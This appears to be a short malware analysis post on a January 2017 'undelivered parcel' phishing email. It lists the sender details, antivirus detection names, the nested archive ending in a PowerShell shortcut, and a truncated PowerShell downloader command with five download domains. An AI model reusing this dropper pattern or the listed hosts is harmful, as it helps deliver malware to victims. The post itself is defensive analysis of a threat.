Email scams – undelivered parcel

Timestamps – end of January 2017 – 26/1/2017 12:06 PM

emailscams-undelivered-parcel1

Email info

  • Sender IP – 91.121.30.151
  • Sender Email – steven.coleman@sitedetest.eu
  • Subject – Parcel #8742826 shipment problem, please review

Attachment

Only TrendMicro relates it to something familiar “TROJ_NEMUZIP.SMA1” while all the others have generic namings for a Powershell script “TR/LNK.PSH.Downloader.Gen” .

Attachment comments

The attachment was made in a Matryoshka style.

Undelivered-Parcel-ID-874826.zip -> Undelivered-Parcel-ID-874826.doc.zip -> Undelivered-Parcel-ID-874826.doc (folder) -> Undelivered-Parcel-ID-874826.doc.lnk = shortcut to powershell

shortcut-to-powershell

This makes sense for AV evasion, but when it comes to the user executing the end file – it doesn’t seem likely that the user will extract a double archive and then go into a folder to actually execute something. Or, they wouldn’t extract anything and just double click until they get to execute the file.

Powershell parameters found in the shortcut shortcut :

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy ByPass -NoProfile -command $ld = 0; $cs = [char]92; $ll = ‘jb-sounddesign.de’,’www.sdo.ru’,’vitalmanage.com’,’www.poolcenterdessau.de’,’www.gifizsee.de’; $fn = $env:temp+$cs; $lk = $fn

Domains listed

  • jb-sounddesign.de
  • www.sdo.ru
  • vitalmanage.com
  • www.poolcenterdessau.de
  • www.gifizsee.de

Post Execution observations to be added